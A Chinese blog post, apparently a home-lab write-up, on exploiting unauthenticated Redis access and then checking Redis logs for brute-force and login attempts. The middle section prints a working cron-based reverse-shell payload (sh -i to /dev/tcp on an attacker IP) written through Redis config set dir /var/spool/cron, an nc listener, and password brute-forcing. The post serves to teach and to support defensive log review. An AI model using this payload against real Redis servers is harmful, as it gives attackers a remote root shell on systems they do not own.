redis未授权访问漏洞利用+redis日志分析

最新推荐文章于 2024-07-25 20:24:31 发布
最新推荐文章于 2024-07-25 20:24:31 发布
阅读量1.5k 收藏 3
点赞数 2
分类专栏: Vulnhub 渗透测试 文章标签: redis 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/130812960
版权

redis未授权访问漏洞利用+redis日志分析

redis未授权访问

远程连接redis

kali: redis-cli -h IP

redis常用语句

set key “value” 设置键值对

get key 获得值

incr intkey 数字类型值加1

keys * 获取当前数据库中所有的键

config set dir /home/test 设置工作目录

config set dbfilename redis.rdb 设置备份文件名

config get dir 查看工作目录

config get dbfilemane 查看备份文件名

save 进行一次操作的备份

flushall 删除所有数据

del key 删除键为key的数据

redis未授权访问利用方法

  1. 设置目录》写入一句话木马》保存到备份文件(写在网站目录下)
  2. 或者搞个定时任务反弹shell
  3. 或者直接写公钥(ssh直接冲!)
  4. 最后redis4.x之后可以通过c语言编译并加载恶意的.so文件(主从复制)

第一种利用方法

需要服务器开启web服务,使用redis数据备份功能结合web服务向网站根目录写入一句话木马从而得到网站的webshell

需要写入权限

第二种利用方法

通过redis数据备份写定时任务,通过定时任务反弹shell

需要root权限

第三种利用方法

通过redis数据备份功能写SSH公钥,实现免密登录linux服务器

需要root权限

安装redis客户端

下载: wget http://download.redis.io/releases/redis-2.8.17.tar.gz

解压: tar xzvf redis-2.8.17.tar.gz

进入目录: cd redis-2.8.17.tar.gz

编译: mack

进入src目录: cd src

将redis-cli复制到/usr/bin目录下:cp redis-cli /usr/bin/

将redis-server复制到/usr/bin目录下:cp redis-server /usr/bin/

开启redis服务

回到/redis-2.8.17.tar.gz目录下

redis-server redis.conf

image-20230522165245512

攻击机kali安装redis

和centos一样

反弹shell

这里试着写个定时任务反弹shell

测试连接

靶机ip:192.168.27.192

攻击机ip:192.168.27.129

redis-cli -h 192.168.27.192

image-20230522170056514

连接成功

写一个反弹shell

sh -i >& /dev/tcp/192.168.27.128/8023 0>&1

改成定时任务的格式

*/1 * * * * sh -i >& /dev/tcp/192.168.27.129/8023 0>&1

写入定时任务

先监听一下8023端口

nc -lvvp 8023

写入定时任务

set x “\n\n*/1 * * * * sh -i >& /dev/tcp/192.168.27.129/8023 0>&1 \n\n”

config set dbfilename root

config set dir /var/spool/cron

save

image-20230522170518711

等待漫长的一分钟

image-20230522170631107

拿到shell

日志审计

爆破redis密码

使用工具超级弱口令检查工具

image-20230522171849948

因为没有密码,所以任意密码可登陆,跑出来个qwerty

接下来给redis加上密码,admin123

关闭redis服务,gedit redis.conf 找到requirepass,把注释符去掉,密码改为admin123 保存退出

再次开启redis服务

image-20230522172025911

使用kali再连接一下试试

image-20230522172227477

需要密码了!

接着爆破

image-20230522172308768

搞出来啦!

用kali尝试一下

image-20230522172501825

成功

日志

image-20230522173118307

这里将日志保存到文件/tmp/log/redis.log,将notice换为debug模式

再tmp目录下mkdir log

然后再启动redis服务

下面继续爆破,然后查看日志

image-20230522173952782

可以看到大量的请求,但是看不出来是攻击,ip为192.168.27.191(windows)

image-20230522174053969

用kali去连接,然后随意操作一下

image-20230522174547391

看不到操作的内容

升级高版本redis!

wget https://github.com/redis/redis/archive/refs/tags/7.2-rc2.zip

后续操作同前面

将redis-server 移动到/usr/bin/

cp redis-server /usr/bin/redis-server2

使用redis-server2启动redis服务

image-20230522180143363

可以启动,然后修改一下redis.conf

image-20230522180331238

image-20230522180633275

将只允许本地连接注释掉,保护模式关掉,然后保存一下,再启动redis服务,再使用kali连接一下

image-20230522180735806

再向上面一样配置一下日志和密码,然后用kali登陆成功一下,失败一下看看日志

成功的日志如下

image-20230522182302013

登陆失败日志

image-20230522182600158

白帽Chen_D
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Redis授权访问配合SSH key文件利用详解
01-19
Redis授权访问配合SSH key文件利用详解】 Redis是一个高性能的键值数据库,它支持网络交互,可以在内存中存储数据并可持久化。由于其高效和灵活的特性,Redis被广泛应用在各种场景中。然而,Redis的安全性问题...
99-web漏洞挖掘之授权访问漏洞1
08-03
总的来说,授权访问漏洞的挖掘和防御涉及网络扫描、代码审计、动态分析等多个层面,需要安全人员具备深厚的技术背景和敏锐的洞察能力。而企业则需构建全方位的安全防护体系,包括定期的安全培训、严格的访问控制...
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3148
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis授权访问漏洞复现
zkaqlaoniao的博客
06-27 404
攻击者在授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
redis授权访问漏洞利用
weixin_53562844的博客
05-07 2175
redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APL,reids默认端口是6379。造成授权漏洞的原因是安全配置作限制,redis默认情况是空密码连接。 利用条件:redis <3.2 利用原理:redis绑定在0.0.0.0:6379,且没有进行添加安全策略,直接暴露在公网,默认是空密码,可以让攻击者免密码登录redis服务。 靶机:192.
Redis授权访问漏洞复现
qq_57817668的博客
06-10 1020
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSIC语言编写、支络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis授权访问漏洞实验
qq_60256199的博客
10-09 3101
Redis是一个开源的内存数据库管理系统,它被广泛用于缓存、消息队列和实时数据分析等应用场景。Redis支持多种数据结构,包括字符串、列表、集合、有序集合和哈希表,可以通过简单的键值对方式存储和检索数据。由于其高性能和低延迟特性,Redis常用于加速数据访问,提高应用程序的响应速度。此外,Redis还提供了持久化选项,允许数据在重启后仍然可用,使其适用于各种持久性存储需求。这一特性使得Redis成为了一个非常强大的数据存储和缓存解决方案,特别适用于需要快速读写操作的应用场景。
Redis授权访问漏洞利用
weixin_65049289的博客
01-17 492
Redis授权访问漏洞
Redis--弱口令授权访问漏洞
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
05-19 1万+
Redis中存在授权访问漏洞,该漏洞源于程序在默认配置下会绑定在6379端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序没有开启认证选项端口对外开放时,攻击者可借助目标服务器访问权限利用漏洞授权访问Redis并读取Redis的数据,在服务器上写入公钥,进而使用对应的私钥直接登录目标服务器。
Redis授权漏洞检测方法+Redis基础+Redis环境搭建+Redis恶意利用
t小小小白的博客
08-23 2276
Redis授权漏洞检测方法+Redis基础+Redis环境搭建+Redis恶意利用作者:山丘安全攻防实验室 O8前言一、Redis命令基础二、Redis漏洞授权挖掘二、Redis环境搭建与概述1)环境概述2)环境搭建三、漏洞利用1)授权漏洞利用说明2)root权限漏洞利用1、创建ssh公匙2、创建一个O8.txt密匙3、清除Redis所有数据4、 Redis创建恶意key5、修改Redis路...
Redis授权访问漏洞利用总结
魂影魔宅
04-24 608
0x01 redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flus...
Redis 授权访问的原理、危害及复现
新青年1号
01-03 1510
Redis 授权访问准确的来说,其实并不是一个漏洞。而是由于开发人员配置不当,而产生的预料之外的危害
关于Redis授权访问漏洞利用的介绍与修复建议
09-09
然而,Redis的一个常见安全问题在于其默认配置可能导致授权访问漏洞,这允许任何能够访问服务器的用户无需认证即可读取或篡改Redis数据。 **一、漏洞介绍** 默认情况下,Redis绑定在0.0.0.0:6379,这意味着它...
Redis 核心技术 + 实战
02-21
- 安全:设置访问权限、防止授权访问,定期更新版本以修复安全漏洞。 通过深入学习"Redis 核心技术 + 实战",我们可以全面掌握 Redis 的使用方法,为实际项目中的高效数据管理打下坚实基础。实践出真知,理论...
redis mac 7.2.3 arm 包
11-07
- 设置密码认证(`requirepass`),防止授权访问。 - 避免在生产环境中暴露Redis直接面对互联网,通常会通过防火墙规则或代理服务来限制访问。 7. **其他注意事项**: - 保持Redis的版本更新,及时修补可能的...
redis的使用场景
最新发布
m0_64821020的博客
07-25 1064
[1]热点数据的缓存 [2]分布式锁 [3]短信业务(登录注册时)
redis基本数据类型
sinat_16493273的博客
07-24 998
Redis提供了多种数据类型,可以用作缓存、消息队列、事件处理,集合运算、分布式协调等。
Springboot实现缓存组件(ctgcache、redis)配置动态切换
qq_45443475的博客
07-25 539
其实整体实现是一个比较简单的过程,核心是需要了解Springboot中@Conditional注解的应用,希望对大家有所帮助。
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值